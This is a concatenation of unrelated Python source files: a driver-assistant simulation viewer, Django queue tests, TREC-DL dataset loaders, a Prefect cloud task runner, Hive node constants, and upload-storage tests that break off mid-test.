from highway_env.road.graphics import WorldSurface
from highway_env.envs.common.graphics import EnvViewer
from bdgym.envs.driver_assistant.action import (
AssistantContinuousAction,
AssistantContinuousOffsetAction,
AssistantDiscreteAction
)
if TYPE_CHECKING:
from bdgym.envs.driver_assistant.env import DriverAssistantEnv
class DriverAssistantEnvViewer(EnvViewer):
"""A viewer to render a Driver Assistant environment """
def __init__(self,
env: 'DriverAssistantEnv',
save_images: bool = False,
save_directory: Optional[str] = None):
super().__init__(env)
# Set class variable to false to ensure image saving is handled
# by this class not the parent EnvViewer class
# it's a bit of a hack, but its the simplest way to achieve this
self.SAVE_IMAGES = False
self.save_images = save_images
self.directory = save_directory
def display(self) -> None:
super().display()
if self.save_images and self.directory:
frame_num_str = "0"*(6-len(str(self.frame))) + str(self.frame)
pg.image.save(
self.screen,
osp.join(self.directory, f"frame_{frame_num_str}.png")
)
self.frame += 1
def handle_events(self) -> None:
"""Overrides parent."""
if self.env.config["manual_control"]:
# All events handled by
# bdgym.envs.driver_assistant.manual_control.AssistantEventHandler
return
super().handle_events()
class AssistantActionDisplayer:
"""A callable class for displaying the Assistant's actions in viewer """
IGNORE_FEATURES = ['presence']
def __init__(self, env: 'DriverAssistantEnv'):
self.env = env
self.font = pg.font.Font(None, 26)
self.surface = pg.Surface(
(self.env.config["screen_width"], self.env.config["screen_height"])
)
self.width = self.surface.get_width()
self.height = self.surface.get_height()
# Display for what the Assistant Observes
self.assistant_obs_parameters = []
self.obs_ignore_idxs = []
for i, f in enumerate(self.env.config['observation']['features']):
if f not in self.IGNORE_FEATURES:
self.assistant_obs_parameters.append(f)
else:
self.obs_ignore_idxs.append(i)
self.assistant_display = DashboardDisplay(
"Assistant Observation",
self.surface,
width=self.width,
height=self.height // 3,
position=(0, 0),
parameters=self.assistant_obs_parameters
)
# Display for the current Assistant action
self.assistant_action = DashboardDisplay(
"Assistant Action",
self.surface,
width=self.width,
height=self.height // 3,
position=(0, self.height // 3),
parameters=list(AssistantContinuousAction.ASSISTANT_ACTION_INDICES)
)
# Display for what the Driver Observes
self.driver_display = DashboardDisplay(
"Driver observation",
self.surface,
width=self.width,
height=self.height // 3,
position=(0, 2*(self.height // 3)),
parameters=list(AssistantContinuousAction.ASSISTANT_ACTION_INDICES)
)
def _get_assistant_action_title(self):
assistant_action_type = self.env.action_type.assistant_action_type
if isinstance(assistant_action_type, AssistantContinuousAction):
return (
"Assistant Action (Driver observation & action recommendation)"
)
if isinstance(
assistant_action_type,
(AssistantContinuousOffsetAction, AssistantDiscreteAction)
):
return (
"Current Offsets applied to Driver observation & "
"recommendation"
)
raise ValueError(
"Unsupported Assistant Action Type for Assistant action display: "
f"{assistant_action_type}. Either use supported action type or "
"disable action display with the 'action_display' environment "
"configuration parameter"
)
def _get_assistant_ego_obs(self) -> np.ndarray:
raw_obs = self.env.last_assistant_obs[
self.env.observation_type.ASSISTANT_EGO_ROW
]
obs = []
for i in range(raw_obs.shape[0]):
if i not in self.obs_ignore_idxs:
obs.append(raw_obs[i])
return np.array(obs)
def _get_assistant_action(self) -> np.ndarray:
assistant_action_type = self.env.action_type.assistant_action_type
if isinstance(assistant_action_type, AssistantContinuousAction):
return assistant_action_type.last_action
if isinstance(assistant_action_type, AssistantContinuousOffsetAction):
return np.zeros(len(self.assistant_obs_parameters))
if isinstance(assistant_action_type, AssistantDiscreteAction):
current_offset = assistant_action_type.current_offset
last_action = assistant_action_type.last_action
return np.concatenate([current_offset, last_action[4:]])
raise ValueError(
"Unsupported Assistant Action Type for Assistant action display: "
f"{assistant_action_type}. Either use supported action type or "
"disable action display with the 'action_display' environment "
"configuration parameter"
)
def _get_driver_obs(self) -> np.ndarray:
assistant_action_type = self.env.action_type.assistant_action_type
return assistant_action_type.last_action
def __call__(self,
agent_surface: pg.Surface,
sim_surface: WorldSurface) -> None:
"""Draws the assistants last action on agent_surface """
assistant_obs = self._get_assistant_ego_obs()
assistant_action = self._get_assistant_action()
driver_obs = self._get_driver_obs()
self.assistant_display.display(assistant_obs)
self.assistant_action.display(assistant_action)
self.driver_display.display(driver_obs)
agent_surface.blit(self.surface, (0, 0))
def render_text(self,
surface: pg.Surface,
pos: Tuple[float, float],
text: str,
color: Tuple[int, int, int],
bgcolor: Tuple[int, int, int]) -> Tuple[float, float]:
"""Render text on surface """
text_img = self.font.render(text, 1, color, bgcolor)
surface.blit(text_img, pos)
return pos[0] + text_img.get_width() + 5, pos[1]
class DashboardDisplay:
"""A surface for displaying parameters and values """
RED = (255, 100, 100)
GREEN = (50, 200, 0)
BLUE = (100, 200, 255)
YELLOW = (200, 200, 0)
BLACK = (60, 60, 60)
PURPLE = (200, 0, 150)
DEFAULT_COLOR = YELLOW
EGO_COLOR = GREEN
BG_COLOR = PURPLE
def __init__(self,
title: str,
parent_surface: pg.SurfaceType,
width: int,
height: int,
position: Tuple[int, int],
parameters: List[str],
font_size: int = 26,
text_color: Tuple[int, int, int] = None,
bg_color: Tuple[int, int, int] = None):
self.title = title
self.parent_surface = parent_surface
self.width = width
self.height = height
self.position = position
self.parameters = parameters
self.font = pg.font.Font(None, font_size)
self.text_color = self.YELLOW if text_color is None else text_color
self.bg_color = self.BLACK if bg_color is None else bg_color
# The Dashboard Display surface
self.surface = pg.Surface((self.width, self.height), flags=pg.SRCALPHA)
# Positions of each parameter
self.title_pos = (0.05*self.width, 0.05*self.height)
self.p_name_y = 0.3 * self.height
self.p_value_y = 0.65 * self.height
self.p_x = [0.05*self.width]
for i in range(1, len(self.parameters)):
self.p_x.append(self.p_x[i-1] + 0.15*self.width)
def display(self, values: np.ndarray) -> None:
"""Update the dashboard display """
self.surface.fill(self.bg_color)
title_img = self._text_img(self.title, self.GREEN)
self.surface.blit(title_img, self.title_pos)
for i in range(len(self.parameters)):
p_text_img = self._text_img(self.parameters[i], self.text_color)
self.surface.blit(p_text_img, [self.p_x[i], self.p_name_y])
v_text_img = self._text_img(f"{values[i]:.3f}", self.text_color)
self.surface.blit(v_text_img, [self.p_x[i], self.p_value_y])
self.parent_surface.blit(self.surface, self.position)
def _text_img(self,
text: str,
text_color: Tuple[int, int, int]) -> pg.SurfaceType:
return self.font.render(text, True, text_color, self.bg_color)
|
<reponame>take-a-number/api<filename>take_a_number/tests/test_queue.py
from django.test import TestCase
from take_a_number.utils.class_queue import ClassQueue, QueueMember, QueueTA
class QueueTest(TestCase):
def create_member1(self, name="Name1", id=1):
return QueueMember(name, id)
def create_member2(self, name="Name2", id=2):
return QueueMember(name, id)
def create_member3(self, name="Name3", id=3):
return QueueMember(name, id)
def create_ta1(self, name="TA1", id = 11):
return QueueTA(name, id)
def create_ta2(self, name="TA2", id = 12):
return QueueTA(name, id)
def create_queue(self):
return ClassQueue()
# make sure QueueTA works as desired
def test_ta_class(self):
member1 = self.create_member1()
helpingTA = QueueTA("john", 11, "teaching_assistant", member1)
self.assertEqual(True, helpingTA.isHelpingSomeone())
self.assertEqual(True, helpingTA.isHelping(member1))
self.assertEqual(member1, helpingTA.getHelping())
helpingTA.stopHelping()
self.assertEqual(False, helpingTA.isHelpingSomeone())
self.assertEqual(False, helpingTA.isHelping(member1))
helpingTA.startHelping(member1)
self.assertEqual(True, helpingTA.isHelpingSomeone())
self.assertEqual(True, helpingTA.isHelping(member1))
self.assertEqual(member1, helpingTA.getHelping())
self.assertEqual(helpingTA.asDict(), {'name': 'john', 'id': 11, 'type': 'teaching_assistant',
'helping': {'name': 'Name1', 'id': 1, 'type': None}})
# test the queue creation and various functions
def test_queue_create(self):
q = ClassQueue('CS1', 'AB1234', [], [], {}, {})
self.assertEqual(True, q.isEmpty())
self.assertEqual(0, q.studentCount())
self.assertEqual(0, q.taCount())
self.assertEqual('AB1234', q.studentJoinCode)
self.assertEqual([], q.getStudentSessionIds())
self.assertEqual([], q.getTaSessionIds())
self.assertEqual({'students': [], 'teachingAssistants': []}, q.asDict())
self.assertEqual(-1, q.removeStudent(10))
self.assertEqual(-1, q.removeTA(10))
# enqueue and dequeue students to queue
def test_enqueue_dequeue(self):
q = self.create_queue()
member1 = self.create_member1()
member2 = self.create_member2()
member3 = self.create_member3()
q.enqueue(member1)
q.enqueue(member2)
q.enqueue(member3)
self.assertEqual(member1.id, q.dequeue().id)
self.assertEqual(member2.id, q.dequeue().id)
self.assertEqual(member3.id, q.dequeue().id)
# queue access/default fields
def test_getters(self):
q = self.create_queue()
self.assertEqual(0, q.size())
self.assertEqual(True, q.isEmpty())
self.assertEqual(False, q.hasTas())
self.assertEqual(False, q.hasStudents())
self.assertEqual([], q.tas)
self.assertEqual([], q.students)
self.assertEqual({}, q.studentSessions)
self.assertEqual({}, q.taSessions)
self.assertEqual(None, q.courseAbbreviation)
self.assertEqual(None, q.studentJoinCode)
# add students and tas to a queue
def test_add(self):
q = self.create_queue()
self.assertEqual(True, q.isEmpty())
ta1 = self.create_ta1()
ta2 = self.create_ta2()
q.addTA(ta1)
self.assertEqual(True, q.isEmpty())
self.assertEqual(0, q.size())
q.addTA(ta2)
self.assertEqual(True, q.isEmpty())
self.assertEqual(0, q.size())
q.enqueue(self.create_member1())
self.assertEqual(False, q.isEmpty())
self.assertEqual(1, q.size())
# remove students from a queue by id
def test_remove(self):
q = self.create_queue()
self.assertEqual(False, q.hasTas())
member1 = self.create_member1()
member2 = self.create_member2()
member3 = self.create_member3()
ta1 = self.create_ta1()
q.addTA(ta1)
self.assertEqual(True, q.isEmpty())
self.assertEqual(True, q.hasTas())
q.enqueue(member1)
q.enqueue(member2)
q.enqueue(member3)
self.assertEqual(member1, q.removeStudent(member1.id))
self.assertEqual(member3, q.removeStudent(member3.id))
self.assertEqual(member2, q.removeStudent(member2.id))
self.assertEqual(0, q.size())
self.assertEqual(True, q.isEmpty())
self.assertEqual(True, q.hasTas())
q.removeTA(11)
self.assertEqual(False, q.hasTas())
self.assertEqual(0, q.taCount())
# add students to a queue and check positions
def test_status(self):
q = self.create_queue()
member1 = self.create_member1()
member2 = self.create_member2()
member3 = self.create_member3()
q.enqueue(member1)
q.enqueue(member2)
q.enqueue(member3)
self.assertEqual(0, q.position(member1.id))
self.assertEqual(2, q.position(member3.id))
self.assertEqual(1, q.position(member2.id))
self.assertEqual(False, q.isEmpty())
self.assertEqual(True, q.hasStudents())
self.assertEqual(False, q.hasTas())
def test_dict(self):
member1 = self.create_member1()
ta1 = self.create_ta1()
self.assertEqual(member1.asDict(), {'name': 'Name1', 'id': 1, "type": None})
self.assertEqual(ta1.asDict(), {'name': 'TA1', 'id': 11, 'type': None, 'helping': None}) |
import sys
import csv
import argparse
from pathlib import Path
from collections import defaultdict
from typing import Dict, Iterable, Set, Tuple
from tqdm import tqdm
from ranking_utils.dataset import ParsableDataset
from ranking_utils.datasets.trec import read_qrels_trec, read_top_trec
# some documents are longer than the default limit
csv.field_size_limit(sys.maxsize)
class TRECDL2019Passage(ParsableDataset):
"""TREC-DL 2019 passage ranking dataset class.
Args:
args (argparse.Namespace): Namespace that contains the arguments
"""
def __init__(self, args: argparse.Namespace):
self.directory = Path(args.DIRECTORY)
self._read_all()
super().__init__(args)
def _read_all(self):
"""Read the dataset."""
# read queries
self.queries = {}
for f_name, num_lines in [
("queries.train.tsv", 808731),
("queries.dev.tsv", 101093),
("msmarco-test2019-queries.tsv", 200),
]:
f = self.directory / f_name
print(f"reading {f}...")
with open(f, encoding="utf-8", newline="") as fp:
reader = csv.reader(fp, delimiter="\t")
for q_id, query in tqdm(reader, total=num_lines):
self.queries[q_id] = query
# read documents
self.docs = {}
f = self.directory / "collection.tsv"
print(f"reading {f}...")
with open(f, encoding="utf-8", newline="") as fp:
reader = csv.reader(fp, delimiter="\t")
for doc_id, doc in tqdm(reader, total=8841823):
self.docs[doc_id] = doc
# read qrels
self.qrels = defaultdict(dict)
q_ids = defaultdict(set)
for f_name, num_lines in [
("qrels.train.tsv", 532761),
("qrels.dev.tsv", 59273),
]:
f = self.directory / f_name
print(f"reading {f}...")
with open(f, encoding="utf-8", newline="") as fp:
reader = csv.reader(fp, delimiter="\t")
for q_id, _, doc_id, rel in tqdm(reader, total=num_lines):
self.qrels[q_id][doc_id] = int(rel)
q_ids[f_name].add(q_id)
# TREC qrels have a different format
f = self.directory / "2019qrels-pass.txt"
print(f"reading {f}...")
with open(f, encoding="utf-8", newline="") as fp:
for q_id, _, doc_id, rel in csv.reader(fp, delimiter=" "):
# 1 is considered irrelevant
self.qrels[q_id][doc_id] = int(rel) - 1
q_ids["2019qrels-pass.txt"].add(q_id)
# read top documents
self.pools = defaultdict(set)
for f_name, num_lines in [
("top1000.dev.tsv", 6668967),
("msmarco-passagetest2019-top1000.tsv", 189877),
("top1000.train.txt", 478016942),
]:
f = self.directory / f_name
print(f"reading {f}...")
with open(f, encoding="utf-8", newline="") as fp:
reader = csv.reader(fp, delimiter="\t")
for q_id, doc_id, _, _ in tqdm(reader, total=num_lines):
self.pools[q_id].add(doc_id)
# some IDs have no pool or no query -- remove them
all_ids = set(self.pools.keys()) & set(self.queries.keys())
self.train_ids = q_ids["qrels.train.tsv"] & all_ids
self.val_ids = q_ids["qrels.dev.tsv"] & all_ids
self.test_ids = q_ids["2019qrels-pass.txt"] & all_ids
def get_queries(self) -> Dict[str, str]:
"""Return all queries.
Returns:
Dict[str, str]: Query IDs mapped to queries
"""
return self.queries
def get_docs(self) -> Dict[str, str]:
"""Return all documents.
Returns:
Dict[str, str]: Document IDs mapped to documents
"""
return self.docs
def get_qrels(self) -> Dict[str, Dict[str, int]]:
"""Return all query relevances.
Returns:
Dict[str, Dict[str, int]]: Query IDs mapped to document IDs mapped to relevance
"""
return self.qrels
def get_pools(self) -> Dict[str, Set[str]]:
"""Return all pools.
Returns:
Dict[str, Set[str]]: Query IDs mapped to top retrieved documents
"""
return self.pools
def get_folds(self) -> Iterable[Tuple[Set[str], Set[str], Set[str]]]:
"""Return all folds.
Returns:
Iterable[Tuple[Set[str], Set[str], Set[str]]]: Folds of train, validation and test query IDs
"""
return [(self.train_ids, self.val_ids, self.test_ids)]
class TRECDL2019Document(ParsableDataset):
"""TREC-DL 2019 document ranking dataset class.
Args:
args (argparse.Namespace): Namespace that contains the arguments
"""
def __init__(self, args: argparse.Namespace):
self.directory = Path(args.DIRECTORY)
self._read_queries()
super().__init__(args)
def _read_queries(self):
"""Read the queries and split."""
def _read_queries(fname):
result = {}
with open(fname, encoding="utf-8", newline="") as fp:
for q_id, query in csv.reader(fp, delimiter="\t"):
result[q_id] = query
return result
train_queries = _read_queries(self.directory / "msmarco-doctrain-queries.tsv")
dev_queries = _read_queries(self.directory / "msmarco-docdev-queries.tsv")
test_queries = _read_queries(self.directory / "msmarco-test2019-queries.tsv")
self.queries = {}
self.queries.update(train_queries)
self.queries.update(dev_queries)
self.queries.update(test_queries)
self.train_ids = set(train_queries.keys())
self.test_ids = set(test_queries.keys())
self.val_ids = set(dev_queries.keys())
def get_queries(self) -> Dict[str, str]:
"""Return all queries.
Returns:
Dict[str, str]: Query IDs mapped to queries
"""
return self.queries
def get_docs(self) -> Dict[str, str]:
"""Return all documents.
Returns:
Dict[str, str]: Document IDs mapped to documents
"""
docs = {}
with open(
self.directory / "msmarco-docs.tsv", encoding="utf-8", newline=""
) as fp:
for doc_id, _, title, body in tqdm(
csv.reader(fp, delimiter="\t"), total=3213835
):
doc = title + ". " + body
docs[doc_id] = doc
return docs
def get_qrels(self) -> Dict[str, Dict[str, int]]:
"""Return all query relevances.
Returns:
Dict[str, Dict[str, int]]: Query IDs mapped to document IDs mapped to relevance
"""
qrels = {}
qrels.update(read_qrels_trec(self.directory / "msmarco-doctrain-qrels.tsv"))
qrels.update(read_qrels_trec(self.directory / "msmarco-docdev-qrels.tsv"))
qrels.update(read_qrels_trec(self.directory / "2019qrels-docs.txt"))
return qrels
def get_pools(self) -> Dict[str, Set[str]]:
"""Return all pools.
Returns:
Dict[str, Set[str]]: Query IDs mapped to top retrieved documents
"""
top = {}
top.update(read_top_trec(self.directory / "msmarco-doctrain-top100"))
top.update(read_top_trec(self.directory / "msmarco-docdev-top100"))
top.update(read_top_trec(self.directory / "msmarco-doctest2019-top100"))
return top
def get_folds(self) -> Iterable[Tuple[Set[str], Set[str], Set[str]]]:
"""Return all folds.
Returns:
Iterable[Tuple[Set[str], Set[str], Set[str]]]: Folds of train, validation and test query IDs
"""
return [(self.train_ids, self.val_ids, self.test_ids)]
|
import copy
import datetime
import warnings
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union
import prefect
from prefect.client import Client
from prefect.core import Edge, Task
from prefect.engine.cloud.utilities import prepare_state_for_cloud
from prefect.engine.result import NoResult, Result
from prefect.engine.result_handlers import ResultHandler
from prefect.engine.runner import ENDRUN, call_state_handlers
from prefect.engine.state import Cached, Failed, Mapped, State
from prefect.engine.task_runner import TaskRunner, TaskRunnerInitializeResult
from prefect.utilities.graphql import with_args
class CloudTaskRunner(TaskRunner):
"""
TaskRunners handle the execution of Tasks and determine the State of a Task
before, during and after the Task is run.
In particular, through the TaskRunner you can specify the states of any upstream dependencies,
and what state the Task should be initialized with.
Args:
- task (Task): the Task to be run / executed
- state_handlers (Iterable[Callable], optional): A list of state change handlers
that will be called whenever the task changes state, providing an
opportunity to inspect or modify the new state. The handler
will be passed the task runner instance, the old (prior) state, and the new
(current) state, with the following signature: `state_handler(TaskRunner, old_state, new_state) -> State`;
If multiple functions are passed, then the `new_state` argument will be the
result of the previous handler.
- result_handler (ResultHandler, optional): the handler to use for
retrieving and storing state results during execution (if the Task doesn't already have one);
if not provided here or by the Task, will default to the one specified in your config
"""
def __init__(
self,
task: Task,
state_handlers: Iterable[Callable] = None,
result_handler: ResultHandler = None,
) -> None:
self.client = Client()
super().__init__(
task=task, state_handlers=state_handlers, result_handler=result_handler
)
def _heartbeat(self) -> None:
try:
task_run_id = self.task_run_id # type: ignore
self.client.update_task_run_heartbeat(task_run_id) # type: ignore
except:
warnings.warn("Heartbeat failed for Task '{}'".format(self.task.name))
def call_runner_target_handlers(self, old_state: State, new_state: State) -> State:
"""
A special state handler that the TaskRunner uses to call its task's state handlers.
This method is called as part of the base Runner's `handle_state_change()` method.
Args:
- old_state (State): the old (previous) state
- new_state (State): the new (current) state
Returns:
- State: the new state
"""
raise_on_exception = prefect.context.get("raise_on_exception", False)
try:
new_state = super().call_runner_target_handlers(
old_state=old_state, new_state=new_state
)
except Exception as exc:
msg = "Exception raised while calling state handlers: {}".format(repr(exc))
self.logger.debug(msg)
if raise_on_exception:
raise exc
new_state = Failed(msg, result=exc)
task_run_id = prefect.context.get("task_run_id")
version = prefect.context.get("task_run_version")
try:
cloud_state = prepare_state_for_cloud(new_state)
self.client.set_task_run_state(
task_run_id=task_run_id,
version=version,
state=cloud_state,
cache_for=self.task.cache_for,
)
except Exception as exc:
self.logger.debug(
"Failed to set task state with error: {}".format(repr(exc))
)
raise ENDRUN(state=new_state)
if version is not None:
prefect.context.update(task_run_version=version + 1) # type: ignore
return new_state
def initialize_run( # type: ignore
self, state: Optional[State], context: Dict[str, Any]
) -> TaskRunnerInitializeResult:
"""
Initializes the Task run by initializing state and context appropriately.
Args:
- state (Optional[State]): the initial state of the run
- context (Dict[str, Any]): the context to be updated with relevant information
Returns:
- tuple: a tuple of the updated state, context, and upstream_states objects
"""
# if the map_index is not None, this is a dynamic task and we need to load
# task run info for it
map_index = context.get("map_index")
if map_index not in [-1, None]:
try:
task_run_info = self.client.get_task_run_info(
flow_run_id=context.get("flow_run_id", ""),
task_id=self.task.id,
map_index=map_index,
)
# if state was provided, keep it; otherwise use the one from db
state = state or task_run_info.state # type: ignore
context.update(
task_run_version=task_run_info.version, # type: ignore
task_run_id=task_run_info.id, # type: ignore
)
except Exception as exc:
self.logger.debug(
"Failed to retrieve task state with error: {}".format(repr(exc))
)
if state is None:
state = Failed(
message="Could not retrieve state from Prefect Cloud",
result=exc,
)
raise ENDRUN(state=state)
# we assign this so it can be shared with heartbeat thread
self.task_run_id = context.get("task_run_id") # type: ignore
context.update(cloud=True)
return super().initialize_run(state=state, context=context)
@call_state_handlers
def check_task_is_cached(self, state: State, inputs: Dict[str, Result]) -> State:
"""
Checks if task is cached in the DB and whether any of the caches are still valid.
Args:
- state (State): the current state of this task
- inputs (Dict[str, Result]): a dictionary of inputs whose keys correspond
to the task's `run()` arguments.
Returns:
- State: the state of the task after running the check
Raises:
- ENDRUN: if the task is not ready to run
"""
if self.task.cache_for is not None:
oldest_valid_cache = datetime.datetime.utcnow() - self.task.cache_for
cached_states = self.client.get_latest_cached_states(
task_id=self.task.id, created_after=oldest_valid_cache
)
if not cached_states:
self.logger.debug(
"Task '{name}': can't use cache because no Cached states were found".format(
name=prefect.context.get("task_full_name", self.task.name)
)
)
else:
self.logger.debug(
"Task '{name}': {num} candidate cached states were found".format(
name=prefect.context.get("task_full_name", self.task.name),
num=len(cached_states),
)
)
for candidate_state in cached_states:
assert isinstance(candidate_state, Cached) # mypy assert
if self.task.cache_validator(
candidate_state, inputs, prefect.context.get("parameters")
):
candidate_state._result = candidate_state._result.to_result()
return candidate_state
self.logger.debug(
"Task '{name}': can't use cache because no candidate Cached states "
"were valid".format(
name=prefect.context.get("task_full_name", self.task.name)
)
)
return state
|
# constants of db start
DID_INFO_DB_NAME = "hive_manage_info"
DID_INFO_REGISTER_COL = "auth_register"
USER_DID = "userDid" # compatible with v1
APP_ID = "appDid"
APP_INSTANCE_DID = "appInstanceDid"
DID_INFO_NONCE = "nonce"
DID_INFO_TOKEN = "token"
DID_INFO_NONCE_EXPIRED = "nonce_expired"
DID_INFO_TOKEN_EXPIRED = "token_expired"
DID_SYNC_INFO_COL = "did_sync_info"
DID_SYNC_INFO_STATE = "state"
DID_SYNC_INFO_MSG = "msg"
DID_SYNC_INFO_TIME = "time"
DID_SYNC_INFO_DRIVE = "drive"
VAULT_BACKUP_INFO_COL = "vault_backup_info"
VAULT_BACKUP_INFO_TYPE = "type"
VAULT_BACKUP_INFO_STATE = "state"
VAULT_BACKUP_INFO_MSG = "msg"
VAULT_BACKUP_INFO_TIME = "time"
VAULT_BACKUP_INFO_DRIVE = "drive"
VAULT_BACKUP_INFO_TOKEN = "token"
VAULT_BACKUP_INFO_TYPE_GOOGLE_DRIVE = "google_drive"
VAULT_BACKUP_INFO_TYPE_HIVE_NODE = "hive_node"
VAULT_ORDER_COL = "vault_orders"
# VAULT_ORDER_DID = "did"
VAULT_ORDER_APP_ID = "app_id"
VAULT_ORDER_PACKAGE_INFO = "pricing_info"
VAULT_ORDER_TXIDS = "pay_txids"
VAULT_ORDER_STATE = "state"
VAULT_ORDER_TYPE = "type"
VAULT_ORDER_CREATE_TIME = "creat_time"
VAULT_ORDER_PAY_TIME = "pay_time"
VAULT_ORDER_MODIFY_TIME = "modify_time"
VAULT_SERVICE_COL = "vault_service"
VAULT_SERVICE_DID = "did" # compatible with v1
VAULT_SERVICE_MAX_STORAGE = "max_storage"
VAULT_SERVICE_FILE_USE_STORAGE = "file_use_storage"
VAULT_SERVICE_DB_USE_STORAGE = "db_use_storage"
VAULT_SERVICE_MODIFY_TIME = "modify_time"
VAULT_SERVICE_START_TIME = "start_time"
VAULT_SERVICE_END_TIME = "end_time"
VAULT_SERVICE_PRICING_USING = "pricing_using"
VAULT_SERVICE_STATE = "state"
# constants of db end
VAULT_BACKUP_SERVICE_COL = "vault_backup_service"
VAULT_BACKUP_SERVICE_DID = "did" # only for v1
VAULT_BACKUP_SERVICE_MAX_STORAGE = "max_storage"
VAULT_BACKUP_SERVICE_USE_STORAGE = "use_storage"
VAULT_BACKUP_SERVICE_MODIFY_TIME = "modify_time"
VAULT_BACKUP_SERVICE_START_TIME = "start_time"
VAULT_BACKUP_SERVICE_END_TIME = "end_time"
VAULT_BACKUP_SERVICE_USING = "backup_using"
VAULT_BACKUP_SERVICE_STATE = "state"
# scripting begin
SCRIPTING_SCRIPT_COLLECTION = "scripts"
SCRIPTING_SCRIPT_TEMP_TX_COLLECTION = "scripts_temptx"
SCRIPTING_CONDITION_TYPE_QUERY_HAS_RESULTS = "queryHasResults"
SCRIPTING_CONDITION_TYPE_AND = "and"
SCRIPTING_CONDITION_TYPE_OR = "or"
SCRIPTING_EXECUTABLE_TYPE_AGGREGATED = "aggregated"
SCRIPTING_EXECUTABLE_TYPE_FIND = "find"
SCRIPTING_EXECUTABLE_TYPE_INSERT = "insert"
SCRIPTING_EXECUTABLE_TYPE_UPDATE = "update"
SCRIPTING_EXECUTABLE_TYPE_DELETE = "delete"
SCRIPTING_EXECUTABLE_TYPE_FILE_UPLOAD = "fileUpload"
SCRIPTING_EXECUTABLE_TYPE_FILE_DOWNLOAD = "fileDownload"
SCRIPTING_EXECUTABLE_TYPE_FILE_PROPERTIES = "fileProperties"
SCRIPTING_EXECUTABLE_TYPE_FILE_HASH = "fileHash"
SCRIPTING_EXECUTABLE_CALLER_DID = "$caller_did"
SCRIPTING_EXECUTABLE_CALLER_APP_DID = "$caller_app_did"
SCRIPTING_EXECUTABLE_PARAMS = "$params"
SCRIPTING_EXECUTABLE_DOWNLOADABLE = "_downloadable"
# scripting end
# pubsub start
PUB_CHANNEL_COLLECTION = "pub_channel_col"
PUB_CHANNEL_ID = "channel_id"
PUB_CHANNEL_PUB_DID = "pub_did"
PUB_CHANNEL_PUB_APPID = "pub_appid"
PUB_CHANNEL_NAME = "channel_name"
PUB_CHANNEL_SUB_DID = "sub_did"
PUB_CHANNEL_SUB_APPID = "sub_appid"
PUB_CHANNEL_MODIFY_TIME = "modify_time"
SUB_MESSAGE_COLLECTION = "sub_message_col"
SUB_MESSAGE_SUBSCRIBE_ID = "subscribe_id"
SUB_MESSAGE_PUB_DID = "pub_did"
SUB_MESSAGE_PUB_APPID = "pub_appid"
SUB_MESSAGE_CHANNEL_NAME = "channel_name"
SUB_MESSAGE_SUB_DID = "sub_did"
SUB_MESSAGE_SUB_APPID = "sub_appid"
SUB_MESSAGE_DATA = "message_data"
SUB_MESSAGE_TIME = "message_time"
SUB_MESSAGE_MODIFY_TIME = "modify_time"
# pubsub end
# other
VAULT_ACCESS_WR = "vault_write_read"
VAULT_ACCESS_R = "vault_read"
VAULT_ACCESS_DEL = "vault_delete"
VAULT_STORAGE_DB = "vault_db"
VAULT_STORAGE_FILE = "vault_file"
BACKUP_ACCESS = "backup_access"
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
DID_AUTH_SUBJECT = "didauth"
DID_AUTH_REALM = "elastos_hive_node"
HIVE_MODE_DEV = "dev"
HIVE_MODE_PROD = "prod"
HIVE_MODE_TEST = "test"
INTER_BACKUP_SERVICE_URL = '/api/v1/inter/backup/service'
INTER_BACKUP_SAVE_FINISH_URL = '/api/v1/inter/backup/save_finish'
INTER_BACKUP_RESTORE_FINISH_URL = '/api/v1/inter/backup/restore_finish'
INTER_BACKUP_FILE_LIST_URL = '/api/v1/inter/backup/file_list'
INTER_BACKUP_FILE_URL = '/api/v1/inter/backup/file'
INTER_BACKUP_MOVE_FILE_URL = '/api/v1/inter/backup/move'
INTER_BACKUP_COPY_FILE_URL = '/api/v1/inter/backup/copy'
INTER_BACKUP_PATCH_HASH_URL = '/api/v1/inter/backup/patch/hash'
INTER_BACKUP_PATCH_DELTA_URL = '/api/v1/inter/backup/patch/delta'
INTER_BACKUP_GENE_DELTA_URL = '/api/v1/inter/backup/gene/delta'
CHUNK_SIZE = 4096
|
<gh_stars>0
from kw_tests.common_class import CommonTestClass
from kw_tests.support import Files, Dirs, DataRam, InfoRam
from kw_upload.data_storage import VolumeBasic
from kw_upload.data_storage import AStorage as DataStorage
from kw_upload.uploader.essentials import Calculates, Hashed, TargetSearch
from kw_upload.exceptions import UploadException
from kw_upload.uploader.translations import Translations
class ADataStorageTest(CommonTestClass):
def tearDown(self):
if Files.is_file(self._mock_test_file()):
Files.unlink(self._mock_test_file())
if Dirs.is_dir(self._mock_test_file()):
Dirs.rmdir(self._mock_test_file())
super().tearDown()
def _mock_storage(self) -> DataStorage:
return VolumeBasic(Translations())
class VolumeTest(ADataStorageTest):
def test_thru(self):
file = self._mock_test_file()
storage = self._mock_storage()
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz')
assert b'abcdefghijklmnopqrstuvwxyz' == storage.get_part(file, 0)
storage.truncate(file, 16)
assert b'abcdefghijklmnop' == storage.get_part(file, 0)
storage.remove(file)
assert not Files.is_file(file)
def test_unreadable(self):
file = self._mock_test_file()
storage = self._mock_storage()
Dirs.mkdir(file)
try:
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz') # fail
assert False, 'Accessing unreadable!'
except UploadException as ex:
assert 'CANNOT OPEN FILE' == ex.get_message()
finally:
Dirs.rmdir(file)
def test_unreadable_seek(self):
file = self._mock_test_file()
storage = self._mock_storage()
Dirs.mkdir(file)
try:
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 10) # fail
assert False, 'Accessing unreadable!'
except UploadException as ex:
assert 'CANNOT OPEN FILE' == ex.get_message()
finally:
Dirs.rmdir(file)
def test_unwriteable(self):
file = self._mock_test_file()
storage = self._mock_storage()
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz')
Files.chmod(file, 0o444)
try:
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz') # fail
assert False, 'Writing to locked file!'
except UploadException as ex:
assert 'CANNOT WRITE FILE' == ex.get_message()
finally:
Files.chmod(file, 0o666)
storage.remove(self._mock_test_file())
def test_unwriteable_seek(self):
file = self._mock_test_file()
storage = self._mock_storage()
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 0)
Files.chmod(file, 0o444)
try:
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 26) # fail
assert False, 'Writing to non-available seek in file!'
except UploadException as ex:
